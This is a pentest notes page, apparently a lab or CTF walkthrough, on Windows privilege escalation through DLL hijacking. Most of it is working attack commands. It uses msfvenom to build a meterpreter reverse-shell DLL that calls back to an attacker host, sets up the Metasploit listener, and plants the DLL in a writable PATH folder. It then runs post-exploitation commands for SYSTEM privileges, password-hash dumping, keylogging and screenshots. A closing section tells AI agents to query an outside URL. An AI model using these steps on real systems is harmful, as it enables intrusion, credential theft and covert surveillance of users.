# DLL Hijack MSF

## Metasploit Method

```
----------------------
Exploitable Service:
C:\Program Files\DeveloperDebugTools\Service\DeveloperService.exe

Write access to this folder, which was in the PATH:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\

If we can get the evil .dll into that PATH folder.
Then restart the service (or reboot).
It will kick off that .dll with System access!!!

----------------------
Create the dll:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll

64 bit option:  
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll

----------------------
Listener:
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set payload windows/x64/meterpreter/reverse_tcp  ..64bit optional
> set LHOST 10.x.x.x
> set LPORT 4444
> exploit

----------------------
Copy to Windows:
> cd data
> python -m SimpleHTTPServer 51001

Windows:
> http://10.102.3.116:51001
.. Also, after downloading.. r.click prop 'unblock' maybe helped?
Works!!

Copy the file here:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath

Rebooted the Windows Server
This kicked off the Service, which ran the evil .dll !!!!!
Watched my "Listener" and picked it up!!!



----------------------
Connected!!
mtp>> sysinfo
mtp>> getuid
mtp>> cd home
mtp>> pwd
mtp>> cd Desktop

met> sessions -i 1
met> getuid
met> getsystem  --will switch you to system privs
met> screenshot
met> hashdump 
met> help   (keylogger, webcam_snap)
met> keyscan_start
met> keyscan_dump   ... shows the keyscan!!

meterpreter > cat flag.txt
```

* REF: [PrivEscWindows-DLLHijack](/07-win-privesc/win-privesc.md#dll-hijacking)
* <https://pentestlab.blog/2017/04/04/dll-injection/>
* <https://www.greyhathacker.net/?p=738>
* <https://www.gracefulsecurity.com/privesc-dll-hijacking/>
* <https://www.securitynewspaper.com/2016/01/02/dll-hijacking-tutorial/>
* <https://www.youtube.com/watch?v=2l_U4pvaFRg>

## More...


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/07-win-privesc/06-dll-hijack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.